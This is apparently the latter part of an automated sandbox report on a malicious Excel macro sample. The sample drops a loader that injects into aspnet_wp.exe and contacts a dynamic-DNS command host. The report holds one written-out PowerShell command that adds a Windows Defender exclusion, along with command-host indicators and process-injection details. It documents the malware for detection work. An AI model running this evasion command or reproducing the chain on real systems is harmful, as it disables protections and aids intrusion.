                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002FE18 SetUnhandledExceptionFilter,16_2_000000014002FE18
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002DE40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000000014002DE40
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400326F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000001400326F4
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FF6E44A1180 Sleep,Sleep,SetUnhandledExceptionFilter,28_2_00007FF6E44A1180
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CCD5F0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FFC9CCD5F0C
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CF152BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FFC9CF152BC
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 33_2_00007FF6E44A1180 Sleep,Sleep,SetUnhandledExceptionFilter,33_2_00007FF6E44A1180

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 protect: page execute and read and write
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 protect: page execute and read and write
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 value starts with: 4D5A
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Thread register set: target process: 7640
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Thread register set: target process: 8476
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Thread register set: target process: 8636
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140001000
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140039000
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140045000
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140076000
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140078000
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140079000
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 3798345010
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140001000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140039000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140045000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140076000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140078000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140079000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 4788F94010
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: C516BBB010
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: GetLocaleInfoEx,12_2_00007FFC9CCBFEC0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: GetLocaleInfoEx,12_2_00007FFC9CEF6860
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: GetLocaleInfoEx,28_2_00007FFC9CC0FEC0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: GetLocaleInfoEx,28_2_00007FFC9CE46860
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 12_2_00007FFC9CD864DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00007FFC9CD864DC
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe; Code function: 16_2_0000000140027330 LocalAlloc,LoadLibraryW,GetProcAddress,GetUserGeoID,gethostname,gethostbyname,GetUserNameW,GetTickCount64,16_2_0000000140027330
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe; Code function: 16_2_0000000140030F3C HeapCreate,GetVersion,HeapSetInformation,16_2_0000000140030F3C

                          Stealing of Sensitive Information

                          Source: Yara match; File source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000021.00000002.1537027703.0000021BC506A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000001C.00000002.1452878031.000001FF21000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000000C.00000002.1315965400.000002333C86A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000021.00000002.1537278105.0000025C5A000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000021.00000002.1537027703.0000021BC5000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000001C.00000002.1452878031.000001FF2106A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000000C.00000002.1315965400.000002333C800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000001C.00000002.1453587554.0000023FB6000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: Process Memory Space: PO202502DAKE.exe PID: 7440, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: aspnet_wp.exe PID: 7640, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: PO202502DAKE.exe PID: 8408, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: aspnet_wp.exe PID: 8476, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: PO202502DAKE.exe PID: 8572, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: aspnet_wp.exe PID: 8636, type: MEMORYSTR
                          Source: Yara match; File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                          Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

                          Remote Access Functionality

                          barindex
Source: Yara match; File source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1537027703.0000021BC506A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.1452878031.000001FF21000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.1315965400.000002333C86A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1537278105.0000025C5A000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1537027703.0000021BC5000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.1452878031.000001FF2106A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.1315965400.000002333C800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.1453587554.0000023FB6000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: PO202502DAKE.exe PID: 7440, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: aspnet_wp.exe PID: 7640, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: PO202502DAKE.exe PID: 8408, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: aspnet_wp.exe PID: 8476, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: PO202502DAKE.exe PID: 8572, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: aspnet_wp.exe PID: 8636, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
MITRE ATT&CK matrix, listed by tactic (digits preceding a technique are the count badge the report attaches to that matrix cell):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: 52 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; 13 Exploitation for Client Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 52 Scripting; 1 DLL Side-Loading; 1 Browser Extensions; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 411 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 2 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 13 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 411 Process Injection; 1 Regsvr32
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 24 System Information Discovery; 111 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 313 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1635002), Sample: PO202503D.xlsm, Start date: 11/03/2025, Architecture: WINDOWS, Score: 100. The graph's text, rebuilt as a process tree; bracketed numbers are the per-process counters the graph shows next to each process (created registry values and created files, per the graph legend).

Sample-level DNS/IP: myasyncrat.ddns.net (signature: Uses dynamic DNS services); star-azurefd-prod.trafficmanager.net; 5 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures

EXCEL.EXE [224 60]
  DNS/IP: f004.backblazeb2.com 149.137.128.16, 443, 49722, ZOOM-VIDEO-COMM-ASUS, United States; s-part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 49737, 49738, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
  Dropped: C:\Users\user\Desktop\~$PO202503D.xlsm (data); C:\Users\user\AppData\...\PO202502DAKE.zip (Zip); C:\Users\user\AppData\...\invoice_log.txt (ASCII)
  Signatures: Office process queries suspicious COM object (likely to drop second stage)
  PO202502DAKE.exe [1 8]
    Dropped: C:\Users\user\SystemRootDoc\msvcp290.dll (PE32+); C:\Users\user\SystemRootDoc\libcares-2.dll (PE32+); C:\Users\user\...\PO202502DAKE.exe (PE32+); C:\Users\user\...\nasrallah_x86.dll (data)
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender
    powershell.exe [23]
      Signatures: Loading BitLocker PowerShell Module
      conhost.exe
      WmiPrvSE.exe
    aspnet_wp.exe [2 1]
      DNS/IP: myasyncrat.ddns.net 84.38.129.34, 3369, 49730, 49731, DATACLUB-NL, Latvia
    conhost.exe
  7z.exe [6]
    Dropped: C:\Users\user\AppData\Local\...\msvcp290.dll (PE32+); C:\Users\user\AppData\...\libcares-2.dll (PE32+); C:\Users\user\AppData\...\PO202502DAKE.exe (PE32+); 2 other malicious files
    conhost.exe
  regsvr32.exe
cmd.exe
  PO202502DAKE.exe
    Signatures: Injects a PE file into a foreign processes
    conhost.exe
    aspnet_wp.exe
  conhost.exe
cmd.exe
  PO202502DAKE.exe
    conhost.exe
    aspnet_wp.exe
  conhost.exe
